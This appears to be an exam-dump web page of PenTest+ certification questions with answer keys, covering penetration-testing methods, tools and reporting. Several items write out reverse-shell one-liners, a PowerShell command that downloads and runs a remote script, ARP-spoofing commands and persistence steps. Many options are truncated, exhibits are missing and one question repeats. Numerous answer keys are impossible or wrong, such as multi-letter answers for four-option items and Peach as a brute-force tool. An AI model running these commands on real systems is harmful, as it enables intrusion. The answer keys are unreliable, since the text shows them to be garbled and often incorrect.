
CompTIA PT0-001 Certification Exam Questions & Answers, CompTIA PenTest+ Certification | SPOTO

Prepare for the CompTIA PenTest+ (PT0-001) certification exam with our comprehensive resources. Our practice tests, featuring the latest exam questions, are designed to help you excel in your preparation journey. The PT0-001 certification is unique in its focus on hands-on ability, testing candidates in diverse environments including the cloud and mobile platforms, alongside traditional desktops and servers. By practicing with our exam questions, sample questions, and exam dumps, you'll gain a deep understanding of the exam content and be well-prepared to tackle the challenges. Our mock exams and exam simulator further enhance your readiness, ensuring you're equipped to succeed on exam day. Take advantage of our exam materials and exam answers to boost your confidence and achieve your CompTIA PenTest+ certification goals.

Question #1
A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
A. Insecure file permissions
B. Application whitelisting
C. Shell escape
D. Writable service
Correct Answer: D
Question #2
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
A. Appendices
B. Executive summary
C. Technical summary
D. Main body
Correct Answer: B
Question #3
Given the following Python script: Which of the following is where the output will go?
A. To the screen
B. To a network server
C. To a file
D. To /dev/null
Correct Answer: A
Question #4
A penetration tester is reviewing the following output from a wireless sniffer: Which of the following can be extrapolated from the above information?
A. Hardware vendor
B. Channel interference
C. Usernames
D. Key strength
Correct Answer: ACG
Question #5
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands: export XHOST 192
B. From the local computer, run the following command: ssh -L4444:127
C. From the remote computer, run the following command: ssh -R6000:127
D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192
Correct Answer: D
Question #6
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis
Correct Answer: A
Question #7
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?
A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems
B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test
C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS
Correct Answer: A
Question #8
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
Correct Answer: A
Question #9
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
A. MAC address of the client
B. MAC address of the domain controller
C. MAC address of the web server
D. MAC address of the gateway
Correct Answer: A
Question #10
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
Correct Answer: AB
Question #11
Which of the following tools is used to perform a credential brute force attack?
A. Hydra
B. John the Ripper
C. Hashcat
D. Peach
Correct Answer: D
Question #12
A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).
A. Cleartext exposure of SNMP trap data
B. Software bugs resident in the IT ticketing system
C. S/MIME certificate templates defined by the CA
D. Health information communicated over HTTP
E. DAR encryption on records servers
Correct Answer: A
Question #13
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
Correct Answer: A
Question #14
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
Correct Answer: D
Question #15
A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation
B. Identify the issues that can be remediated most quickly and address them first
C. Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time
Correct Answer: B
Question #16
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
A. arpspoof
B. nmap
C. responder
D. burpsuite
Correct Answer: A
Question #17
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security
B. Enable a secure cookie flag
C. Encrypt the communication channel
D. Sanitize invalid user input
Correct Answer: C
Question #18
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled "changepass."
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root p
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw
B. Create a copy of changepass in the same directory, naming it changepw
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'
Correct Answer: A
Question #19
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing
Correct Answer: C
Question #20
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets
B. The tester needs to retrieve the SAM database and crack the password hashes
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system
Correct Answer: B
Question #21
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service
B. Complete all findings, and then submit them to the client
C. Promptly alert the client with details of the finding
D. Take the target offline so it cannot be exploited by an attacker
Correct Answer: D
Question #22
A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
Correct Answer: A
Question #23
Which of the following excerpts would come from a corporate policy?
A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric
B. The help desk can be reached at 800-passwd1 to perform password resets
C. Employees must use strong passwords for accessing corporate assets
D. The corporate systems must store passwords using the MD5 hashing algorithm
Correct Answer: B
Question #24
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0>&1
Which of the following describes what the command does?
A. Performs a port scan
B. Grabs the web server's banner
C. Redirects a TTY to a remote system
D. Removes error logs for the supplied IP
Correct Answer: AC
Question #25
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
A. Mandate all employees take security awareness training
B. Implement two-factor authentication for remote access
C. Install an intrusion prevention system
D. Increase password complexity requirements
E. Install a security information event monitoring solution
F. Prevent members of the IT department from interactively logging in as administrators
G. Upgrade the cipher suite used for the VPN solution
Correct Answer: A
Question #26
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
A. Perform an HTTP downgrade attack
B. Harvest the user credentials to decrypt traffic
C. Perform an MITM attack
D. Implement a CA attack by impersonating trusted CAs
Correct Answer: A
Question #27
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
A. Set the execution policy
B. Execute a remote script
C. Run an encoded command
D. Instantiate an object
Correct Answer: C
Question #28
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: DE
Question #29
A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?
A. Transition the application to another port
B. Filter port 443 to specific IP addresses
C. Implement a web application firewall
D. Disable unneeded services
Correct Answer: D
Question #30
A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan
Correct Answer: B
Question #31
A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy: Which of the following types of vulnerabilities is being exploited?
A. Forced browsing vulnerability
B. Parameter pollution vulnerability
C. File upload vulnerability
D. Cookie enumeration
Correct Answer: A
Question #32
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
Correct Answer: A
Question #33
A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability?
A. Very difficult; perimeter systems are usually behind a firewall
B. Somewhat difficult; would require significant processing power to exploit
C. Trivial; little effort is required to exploit this finding
D. Impossible; external hosts are hardened to protect against attacks
Correct Answer: C
Question #34
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
Correct Answer: D
Question #35
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)
A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d
B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12
C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d
D. Create a fake service in Windows called RTAudio to execute manually
E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio
F. Create a scheduled task to call C:\windows\system32\drivers\etc\hosts
Correct Answer: AC
Question #36
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
A. Randomize the credentials used to log in
B. Install host-based intrusion detection
C. Implement input normalization
D. Perform system hardening
Correct Answer: AE
Question #37
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
A. Shodan
B. SET
C. BeEF
D. Wireshark
E. Maltego
F. Dynamo
Correct Answer: CD
Question #38
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence
Correct Answer: A
Question #39
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)
A. The tester discovers personally identifiable data on the system
B. The system shows evidence of prior unauthorized compromise
C. The system shows a lack of hardening throughout
D. The system becomes unavailable following an attempted exploit
E. The tester discovers a finding on an out-of-scope system
Correct Answer: A
Question #40
A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo “8
Correct Answer: D
Question #41
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
Correct Answer: D
Question #42
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
A. Stored XSS
B. Full path disclosure
C. Expired certificate
D. Clickjacking
Correct Answer: D
Question #43
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1
Correct Answer: D
Question #44
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence
Correct Answer: A
Question #45
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. ICS vendors are slow to implement adequate security controls
B. ICS staff are not adequately trained to perform basic duties
C. There is a scarcity of replacement equipment for critical devices
D. There is a lack of compliance for ICS facilities
Correct Answer: B
Question #46
Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?
A. Manufacturers developing IoT devices are less concerned with security
B. It is difficult for administrators to implement the same security standards across the board
C. IoT systems often lack the hardware power required by more secure solutions
D. Regulatory authorities often have lower security requirements for IoT systems
Correct Answer: A
